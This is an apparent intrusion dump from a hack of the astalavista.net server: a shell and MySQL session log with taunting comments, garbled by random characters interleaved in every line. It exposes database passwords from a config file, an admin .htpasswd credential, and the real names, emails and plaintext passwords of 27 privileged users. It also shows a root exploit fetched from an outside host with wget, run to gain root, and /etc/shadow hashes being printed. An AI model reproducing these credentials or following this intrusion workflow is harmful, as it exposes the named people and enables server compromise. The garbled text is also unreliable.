drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007* M3 P) r/ M d0 I& u- @* o
drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql6 d* ?7 s3 H; f6 b* B- c
drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com
! v0 z1 }# `( X* u6 @/ Fdrwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
& b! c9 G$ I% u2 n, q0 |drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner
3 E* D8 K2 _. N-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg
3 g q% v, F) X1 O1 _drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
5 e/ x% B( } Hdrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron' k4 u3 _( P s$ P! T# |( L/ Z# l5 I
drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd9 i9 Y9 G' Q& l8 K: _4 f
-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php1 P! M3 b6 ^4 Y* I
-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico5 _; m$ U( Y4 G
drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
1 r9 B2 x H- r' F6 Q) u" R8 mdrwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour/ v/ p7 k. l' l7 W: X" v6 `7 U
-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess k5 m7 B. V. \( r8 K$ G, j
-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess, o- }6 J2 y8 ^- y7 `% H; m
-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php/ w$ D: L1 O& D; X/ F7 k
-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html
! S5 M7 d4 t( _/ l4 n-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php' u9 K' g5 C3 A9 o
-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php+ X2 s Q$ `8 Z# D+ p+ q
-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf F% R3 a2 _4 [3 _" f
drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc9 R% Q: S( ~1 @3 t1 s) x" f6 b9 a
drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang
* t4 ~$ c1 K/ C# Ddrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib' U2 o( f! c- o3 a v8 Y0 Z. C
drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log- w& z' u8 P" C/ |) D& l( o3 ^
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member) P+ T2 U4 a( `5 d% A
drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata
( S r' g# o4 B& |+ xdrwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
/ }" a9 M% n* G6 W-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf
" r! t* ~4 q$ o* q# u5 Ldrwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re2 y v* e t. q
-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt( W; ~, q/ U5 \; p8 N5 \4 @
drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss6 C3 R& D9 L1 e$ H: H8 c* P" F2 }
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources9 L/ K9 u8 Q3 I8 P# {3 K
drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com
c+ M; `2 W8 o; fdrwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes
& c# _6 T6 }2 F R2 B/ vdrwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src0 o2 s; l% m8 o& F1 x' z
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
* L8 ?. C2 \0 |drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2
- @) R' C0 I. ^6 F+ r1 wdrwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
% M: b9 q6 c4 r- j-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php
+ f; [& d3 q) ~1 m( o. r5 @9 v5 ]drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki
7 a, n0 |2 [( n; \" r) X
% a& g. g7 \& Csh-3.2$ head -20 index.php
4 L! b# h, F2 U& j<?PHP
- y* q0 k) n; {, t# w/**& t& u! i& y- L2 I3 z4 n% q
* Mainfile (external) for astalavistaNET v2.0
! t4 y' Y$ w6 g' k3 s% ^& _/ j*
1 I: Q r) X) m) I4 c1 _* @copyright Astalavista IT Engineering GmbH
8 T% m f8 X4 L* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>% K( c- r X: ^9 g/ S0 b
* @version 1.0
( G3 u5 A6 M1 B) ?2 G0 J U*/" ~3 G; A* v" O7 R0 M& x
$ E7 L# f! }5 T* ]: t* `* R6 p if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {
' m5 ]- a2 n5 u- w3 D% Q' [5 N $dontStartSession = false;8 L& n% m9 h& S* r
} else {6 }/ b, M: L) d0 W/ L2 A
$dontStartSession = true;
) x8 w1 y2 |& X6 `6 ]. F8 m S5 c }
/ m* t4 d! a0 R) q require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);
7 c: E: K( ?5 R1 M8 G% S require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
4 ^. S6 n2 V' f1 m8 X require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’); H2 l5 M; v, x7 M; [! G* d5 k, O
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);
7 }8 O3 n! q- W4 l: U0 I7 T4 X7 t- S+ y9 G0 W
sh-3.2$ cd config
& }0 V9 ]& G& |6 osh-3.2$ ls -la
: N1 j$ A1 J1 N6 `3 u3 Dtotal 32
8 ^, h6 O# m. Edrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .5 n7 b7 a2 P* F
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..$ {% }; z4 X, G$ I' ]6 G
-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php4 L7 i9 L) Y0 d9 u7 @3 f
-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php4 _3 j' N& g% J& w
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php
?& ^; C Y* \1 O( ]-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
) B0 T1 ?7 J: N. z3 ^-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php
& Q) k( K& ]$ w2 M% w0 y8 ~+ | }- E. {( ]1 p
sh-3.2$ cat com.conf.php e2 n6 K( r# T( X# H2 O8 D4 y9 w. i
[snip]) h+ `3 r6 y8 u
//member-database
( P$ S0 F2 V) h: i* l( j$_CONFIG['db_mem_server'] = ‘localhost’;* @. ?) f+ E+ ]' A1 J
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;# @, q$ q& Q' ~' e4 ]* m4 O
$_CONFIG['db_mem_user'] = ‘astanet_db’;
: t' \% e4 Q- \! g$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;& d+ @- _0 R) R: u0 a" R
$_CONFIG['db_mem_debug'] = false; //true or false: _9 u) ^. Z( S1 e; j, Y- N) ~
//ads-database! W9 [& l' U$ ~
$_CONFIG['db_ads_server'] = ‘localhost’;: h- v7 `" Q" S1 P# ?3 b
$_CONFIG['db_ads_database'] = ‘astanet_ads’;
. `2 J, K0 a( I, H5 [$_CONFIG['db_ads_user'] = ‘astanet_db’;8 p5 b. D5 j( d! p- m5 ]; e7 x4 z
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;
1 _; ]; ^5 Z( R- P. L F& w2 X$_CONFIG['db_ads_debug'] = false; //true or false8 n; p- k. ~3 m: D6 Y0 C8 G
//rainbow-database' x; H5 \ ~2 |
$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;
B3 I( p$ y0 U% b; I& M$_CONFIG['db_rainbow_database'] = ‘rainbow’;
! w8 J1 A' P6 `7 ^$_CONFIG['db_rainbow_user'] = ‘dinu’;7 |. T. m9 X" V8 D# x- g |
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
! h" G# n( t6 T$_CONFIG['db_rainbow_debug'] = false; //true or false
( L' }, x v( s$ j$ [1 g" Y0 X/ P//mailing lists database
: Y; p3 O, p: \, O$_CONFIG['db_mailing_lists_server'] = ‘localhost’;
8 m( ~+ q, [7 t" d; P! x- A: S( l$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;
$ J1 f4 b" V, k2 X& A$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;
6 O" s: F! Y( z& `2 N$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;
0 t5 q& E2 e2 k4 I7 D$_CONFIG['db_mailing_lists_debug'] = false; //true or false4 g( p/ E9 U3 M8 b2 p" M4 H* }& V
//paypal
7 E/ X1 i) S8 X/ B& w3 B2 @+ b$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;, \( z# E( _9 Z
$_CONFIG['sub_pp_cmd'] = ‘_xclick’;
' _- L- W4 d9 s5 Y$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;& S& [ X% w M, n4 c$ F9 Q& `
$_CONFIG['sub_pp_noship'] = ‘1′;
- M4 e! b* x9 ]' j: z" s$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;
8 s& F1 K& f5 d/ D+ X- S[snip]
$ l% S' `: s2 C+ z5 X4 G
F1 c6 O! J# Q' D/ h, e# G! Hsh-3.2$ cd ..
2 |* @/ n ~" J: e! n3 ?1 ]" Gsh-3.2$ cd member. c5 R! v8 B6 @; [+ H
sh-3.2$ ls -la9 O5 m+ @2 } n& F# S% o- z/ s
total 20
* f* J/ r8 @) c5 pdrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .6 N" ~5 A1 |; k! j- N6 s! ~6 Z
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
: _' I/ Z6 X& R* ]( @0 A-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess$ Q) I% [' t+ ^3 @$ ?
-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php
4 u: l8 H" b* z: [3 ush-3.2$ cat .htaccess3 l0 L1 N, \4 L* T1 L% D
SecFilterEngine off
: j- \; C |& i0 r. C2 h
$ ^' z4 D8 s- h* u: b: Vsh-3.2$ cd .." l3 j3 b( Z( L8 Z q7 o- A
sh-3.2$ cd cron1 C6 x5 w: s$ j
sh-3.2$ ls -la
, _ Q; P' o; p; _total 168
! m- \! g+ t/ Edrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
. k' C, @. P* c R7 I1 @- n6 G/ k5 mdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
$ a& J( L' s2 w-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
# p2 g4 n! a) ~, ]: P% F% A-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php
+ Z+ r9 J4 d4 n) @1 S- j-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php
3 i3 C. o9 }+ U- l-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
. |; K8 Y; x. D/ f" q9 `' w-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php0 L3 _( J) z2 x9 X7 u$ r% {. `
-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php6 s* { W' Z/ P5 ^; D
-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php
3 H9 q+ g" l$ O h1 I* I-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php
, B5 `- A+ v$ f0 ]6 p) U5 l-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh8 o* l% c u- ^8 B0 f. b) h) }
-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
+ f& b. Y2 y% Y8 n0 n-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php v4 p! X1 J* F8 A
-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
( A% q% R. q$ U t! h-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh
& L/ i# y! I% f! a1 b7 a# }; m-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php: {5 E& y5 @, s% F4 w- v# X
-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php6 U% Q9 _( K0 p) ^
-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php. F7 P8 M; ]! V4 u1 }4 r
-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
: ]7 x/ k r% l-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php
" z, A# ]5 o7 X. x `) o! Rdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email$ U: d$ o: C& C( R7 T# k7 w; x
-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php
1 v. u9 d& m8 ~$ T-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php
, A5 y+ P5 [4 N* I- H5 l
+ n# z: W' d3 c1 t( qsh-3.2$ cd ... [3 v% I7 f) `5 [
sh-3.2$ cd _0077 c# Q! T4 e4 ^; R3 \+ Q
sh-3.2$ ls -la
4 b" a. ?0 M5 q: g0 ]( U8 _total 247 S/ Q. k4 p9 J
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .
& @0 ?9 G, }* L0 N0 b; p' Idrwxr-x— 29 astanet apache 4096 Jan 6 13:58 .., B2 e! _+ y% a- K. B0 B0 E
-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess. G( V7 b+ D! [
-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php
8 A4 r( e: q8 \. B-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php' X$ J& \5 i {' h
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap! \0 ~" d& w! U0 o# h
/ |. }) Q( k0 h3 Wsh-3.2$ cat .htaccess l. m: ?- X1 Y0 Y
authType Basic2 s ~- Z. P& ]7 e5 J
authName Admin
# U4 x/ f* z; d, t0 U% }- ^4 QauthUserFile /home/astanet/auth/.htadm_pwd
) V1 K8 B7 r3 }* e+ P5 I! Nrequire valid-user& U% {: C4 `5 f4 x s; P& N. N9 S
# D! E7 ]: R. e2 G |( P3 T
sh-3.2$ cat /home/astanet/auth/.htadm_pwd
2 E. G) G8 f$ vadmin2net:CR0bl65MwhfT7 B) q: c% p- A
+ U7 n: p4 j/ @: |& g" b
sh-3.2$ mysql -u astanet_db -p$ E0 {7 t& i4 ]' O7 }
Enter password:
, d( _4 ?+ }" V. }' m2 ?5 _& E1 MWelcome to the MySQL monitor. Commands end with ; or \g.% V2 R- } V) | q7 n
Your MySQL connection id is 275153
$ ?8 }4 W; v! m3 K5 f, aServer version: 5.0.45-community-log MySQL Community Edition (GPL). N& g/ r4 c* ]% i3 n7 ?' J1 d$ e
: |4 v- R, L3 K
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.* J6 X1 ?' A+ p5 T" E
, o' y5 m6 T b5 J
mysql> show databases;+ C% ?0 \8 h! Q9 L J. y
+———————–+1 O% B/ j& W$ [2 T+ e J
| Database |' e0 p! E* m5 Q5 f$ [
+———————–+
; d) R/ Y1 \- d| information_schema |2 |* x9 D z6 f! X7 `' E
| astanet_ads |
: \ f! n, m+ {/ \5 W| astanet_mailing_lists |' x+ `' i# i7 g7 b, _
| astanet_mediawiki |
. }3 r: v1 a, M' _6 Y( H' j| astanet_membersystem |) p+ v" l C4 e t; x6 }
| test |* R( k; B3 |, Z. q
+———————–+0 ?5 x* v1 F' q% A! G/ W* t5 S
6 rows in set (0.00 sec)
6 t+ y1 O: Q: y+ E; Q: I2 x8 _3 ^4 d! R0 M' F$ \( A
mysql> use astanet_membersystem
3 g( { Q) i; [& D3 Y7 v& a$ u* ^Database changed
- S& v8 q* [: {9 D0 c5 zmysql> show tables;' C% o' B3 P9 i% o' i$ e4 d
+———————————–+
* j" f# e* n. d+ k! Y& v| Tables_in_astanet_membersystem |
1 C( T* R+ @9 r2 z+———————————–+& G6 b5 @8 }3 b" T) v( p" b0 m
| blacklist_categories |
/ v2 d9 u, w4 L2 c$ B| blacklist_content |
: E9 b; ]. m5 [* h6 d| blacklist_levels |
1 Z8 z5 A% |" W- H) c| blacklist_mcset |# Q. y9 ~ v8 [5 h+ S
| dir_categories |* S+ L: \) o B; ~4 V& s( R$ F) t' q
| dir_comments |( P# E6 v- ~- Y
| dir_links |6 G) g) r8 S4 q4 H
| dir_temp |
7 T; x8 Q; V- K, t| dir_votes |
9 J5 e, A' c4 Z. X1 F b5 j| documents |
2 F9 g, r% `8 s7 I* Y& a| documents_categories |
6 M3 X3 i3 J- D$ I% Q2 s| email_content |
+ D% [* ]. o# d) g- R9 g" q% e| email_settings |8 t) m* i( ?. W6 ` W8 k( M
| exploits |
9 @/ y9 }5 b6 j! X I' P| exploits_categories |/ J/ ^1 K; E8 y$ z- V, J# a$ @
| exploittree_categories |
* W; U; t/ Z+ I5 R! U7 r8 B| exploittree_exploits |
6 S/ Z+ u0 s: Z3 w. T7 g9 Q' t| home_values |5 y& y5 r t% V5 B
| iso_countries |
: Q- P! ~" V9 V| links_categories |0 c h6 e. q8 K. u) Z
| links_records |
/ `3 w* b/ C* ]1 {| links_unauth |
# b4 S- x n9 P: @ u7 `| links_votes |
( y p8 Q* K) n7 P( R/ z| log |
, A2 v; r9 l( b| news_categories |% A4 l2 R% \! ?8 `% @
| news_comments |
5 h; Z1 {+ P0 Y- H& Q* I8 o| news_emoticons |
: l% X4 B% h8 d! B" B9 |8 M0 [| news_latest |
F0 y" N) o4 u. [; S/ C| news_messages |3 S: Q# a7 Y/ g0 F
| news_statistics |
/ m5 V" Y1 L# l( ^: t. t| news_votes |
, s! X Z: J5 {) X8 F| prices_content |
% W" R# D: {7 G: f+ l| prices_offers | G9 {, _( v: [8 P
| rss_settings |
2 }" @5 `5 ~: r8 a7 x5 W, a5 b- @| sessions |/ E+ ~* c4 _* D
| stats_signups |* F' g% E8 G) R( D/ f& E- M
| u2u2 |0 v' ?2 n& K$ P% N
| u2u_contact |2 R5 Y% X4 {" |7 e
| u2u_settings |
" K7 L% | `5 ~/ x3 l| user_keywords_selected_categories |& L7 q" s7 b" v
| users |: a+ V3 J9 m2 J J
| users_ipn_test |3 H6 \5 G9 s; `& C) b
| users_keyword_values |
4 x7 r0 X4 v1 l/ E0 g& s| users_profile |) ]0 Q% L5 \0 J4 A' n, c+ a6 t
| users_temp |, V$ }# x) z/ B
| users_upgrade |+ ] y7 I1 |9 Z" d" n
+———————————–+
% u; \ x f( u) R0 X46 rows in set (0.00 sec)5 ~! G9 {9 O2 e( I" x5 t1 @
. o: ^, _5 E5 q! mmysql> describe users;
/ j8 p/ G% I- H/ M1 u7 @0 B1 Q+————————–+————————————–+——+—–+———————+—————-+
6 C3 o6 h- G1 F3 n8 [2 k4 F- @! @| Field | Type | Null | Key | Default | Extra | z5 V0 I) k( |2 g
+————————–+————————————–+——+—–+———————+—————-+
- d: c' O# i h( \. `8 L| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
3 w4 K$ W9 i+ o% r' f9 p% b! Z| user | varchar(50) | NO | | | |$ `. F! `( w8 Q4 k0 Q' o8 D
| nickname | varchar(30) | NO | MUL | anonymous | |
& N6 J5 D" L* V8 i8 C- s% P| password | varchar(30) | NO | | | |
& ?; y7 q& @4 `& J. _' s| userlevel | tinyint(3) | YES | MUL | NULL | |. M7 c( T# b7 V7 {) A! k
| exp | int(8) unsigned | NO | | 0 | |7 m: G& w+ b* `2 h# O4 V# D
| email | varchar(50) | NO | | | |
' `$ L/ x4 M5 y- d! u1 `| ip | varchar(15) | NO | | 0 | |
$ S) k( |# _) c' u a| proxy | set(’0′,’1′) | NO | | 0 | |
- u( [* {7 v/ O' o! W| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |4 {9 M$ j' Q) y- Y0 V
| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |
. k; ^; h3 T1 P. Z/ `| anz_in | tinyint(1) | NO | | -1 | | d; y1 f" v( Y- h3 |$ l7 |
| status | tinyint(1) unsigned | NO | | 0 | |' X% q+ j/ a3 y5 u
| checked | set(’0′,’1′,’2′) | NO | | 0 | |
2 w9 [* e* i4 o2 z7 ?, O( n) A| freemember | set(’0′,’1′) | NO | | 0 | |9 }5 Y! [: _/ t0 ]2 [
| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |" ?- o2 z6 a0 | b* o
| lang | tinytext | NO | | | |5 P3 \" o7 {# r+ w2 C5 I! I% F
| adid | smallint(6) | NO | | 0 | |' \+ \2 V8 g" n& M
| pp_txn_id | varchar(255) | YES | | NULL | |8 Q4 |# l% |5 W) ^, S' r1 `! ?; m
| cnb_transaction_id | varchar(255) | YES | | NULL | |9 d' Z0 \. R( g) R2 C! k
| cnb_order_id | varchar(255) | YES | | NULL | |' v7 c* x! U$ b; q
| cnb_user_id | int(11) | YES | | 0 | |
6 N6 `% |) @2 ^+————————–+————————————–+——+—–+———————+—————-+
7 J6 F! {7 b; p22 rows in set (0.01 sec): l) A: N) u1 ~! t! {9 S
5 |+ z% l; v4 R2 o8 e, g
mysql> select count(*) as skids from users;
6 N. [- b6 q5 Q9 ]. P0 m' W6 y+ [+——-+* j% V( @ w% s/ h
| skids |$ w1 A& |4 J9 i+ E2 j- q5 P
+——-+
4 Q V' z' k& B4 c/ L! K2 m8 J| 25199 |
* y7 W! p+ U" G9 Q2 z" y, ^, W. o+——-+
9 ^5 [ ^& m: u R) |1 row in set (0.00 sec)7 }, H% M" P Y9 W
2 z8 h! P! _. T5 s: [% Z) k
mysql> select user,nickname,password,email from users where userlevel = 1;
+ ?- z; U( W, l1 @$ ]6 N+————————–+———————-+——————+———————————–+ }6 M3 g2 \$ Y; S$ i9 e4 V
| user | nickname | password | email |
7 p0 J6 ^. J9 m5 Z+————————–+———————-+——————+———————————–++ R C; A& h/ ?2 k6 t. a+ n
| pascal | prozac | astaman3 | 链接标记info@astalavista.net |# ~8 |0 _5 F8 S. M# S: y
| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |. q* A: d3 n' y
| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |
+ {$ ~) _$ E% K! }| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |; q4 z, @8 @0 W# T
| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |
8 y; i. c H. _% {6 E| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |
\, j7 n9 ^7 D6 h. W| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |
1 j: g+ w6 e. ?& q: n| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |% Q8 W% K, u; W+ W' `
| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |
2 M( C8 X. W% ]3 [| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |$ Q4 d: L) a" k
| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |# @$ L; D. a' C$ B0 o/ V
| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |! @! g! {2 r* I" m
| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |
: e/ b* |$ J7 g$ C7 K9 k/ N) c| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |
: Q* z4 V! t2 a: Z: {7 R| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |: B" J% a4 t% B. D) u! E
| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |
1 G9 B! {7 ^/ D9 n; ]4 ^; z8 B4 L2 I+ }| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |
7 |4 n7 _' F* _| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |( i; I1 s9 C+ s# c- F- O
| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |' N! U0 @$ a p% C9 M1 r
| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |, r9 v7 A: Y% R2 j
| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |
& O4 `' B* o: M( ~/ y| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |
( o; d# Y% E9 X3 x% D$ q$ z: u9 P+ V| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |
. u7 u6 j8 W/ \+ D) w K: i1 {: T) }7 C| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |+ x3 [: E1 p" N D) |
| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |! s) m8 A$ y3 b# p( h; q$ ^4 R
| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |
N+ p5 C2 c. F4 ?+ S$ D O2 V+ F| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |
* r6 R" i+ S/ r+ z# k+————————–+———————-+——————+———————————–+" G: W. u6 ]9 B2 E+ H: y
27 rows in set (0.00 sec)5 j- i u* J- x- Z% z( W
k! l5 n W( f. fmysql> exit;
' w: T0 L7 L8 _8 eBye3 Z. C) k4 a, |) W( V
2 w9 u9 `( V6 u% d" U# w4 @8 m. P[~] plaintext passwords? yes,) Q$ S' i' V( t$ D8 Z/ x
Those so called “security professionals” who charge you $6.66 / month to
8 ^+ z$ R+ O0 M+ h6 D2 ]register at their hack-proof portal, save your passwords in plaintext…& A+ g) A4 \& L' b# j( _
brilliant!
+ X9 a R$ y% P7 h0 I; F5 {
$ `0 |/ f S. Q% n: q, g$ I- z[~] This been fun but we want more.
# `2 P9 w( T! Z2 S. D+ M4 s D8 Y* S1 Y
sh-3.2$ uname -a5 I4 p& K" V! B. D3 ]
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
i1 [* J8 M& H6 D; u" |sh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]( Q1 H; I0 ], `/ n4 E% g
–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]
0 b, e0 Q7 g* l, w2 @Resolving anti.sec.labs… 13.33.33.37, h& [, v N8 S! A* X
Connecting to anti.sec.labs|13.33.33.37|:80… connected.# x8 ~0 I$ O% M$ K
HTTP request sent, awaiting response… 200 OK
, }. q4 r3 q$ Y5 ILength: 18200 (18K) [text/plain]* D! z! O1 s; q! I* z, l
Saving to: `g0troot’8 g$ E b9 N+ `- }& b& L% N
4 _% C1 o1 b/ Y- n( x100%[=========================================================================================================================================>] 18,200 58.6K/s in
6 P( p8 `$ ~- @9 O1 _0.3s0 o; e5 l/ U) E% I- b
; x9 a$ Q. ^$ o0 B' ]6 _7 t
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]( ~1 I6 k7 Z3 C. p3 ^2 N
& r7 @8 @1 N0 C( K9 V8 ush-3.2$ ./g0troot -i x86_64* N) h% F) K$ ^' g- l5 }
[+] g0troot - anti.sec.labs8 [9 K. g5 P0 F; @0 J6 a# H
[+] Target: 2.6.18-128.1.10.el5
U3 G" B: u, b; Q( A0 F* o[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]4 C9 p. ]! ?- ^
' _1 Q& a9 _! Q4 `' J$ L$ W' g* m
[+] r00tr00t
4 U0 t5 ~. ]* N) L[~] Executing shell…* r5 N9 }& f3 l/ I/ M; ^4 j
9 T! ^8 y L$ m6 k; @, F8 Msh-3.2# id/ ^. q2 X+ r2 q) b4 r! {
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
0 T# j, m# ?$ H% {9 }# h6 t% y6 b( B3 ]
sh-3.2# cat /etc/shadow
3 f$ h& q0 ?1 z4 oroot 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
) Q9 o* d$ `6 w) R& R& o/ G' y[snip]# z9 v8 k4 u0 I7 ^, M
admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::9 u" a9 U$ E( V) L* x0 \
jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::( x& y9 G9 J) K! c d# H1 }
com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::! U& U$ U" p' D1 v8 m+ |; F
astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
0 [' Z% S6 L- n9 y6 u' i M' W6 Y! `3 I1 k# f
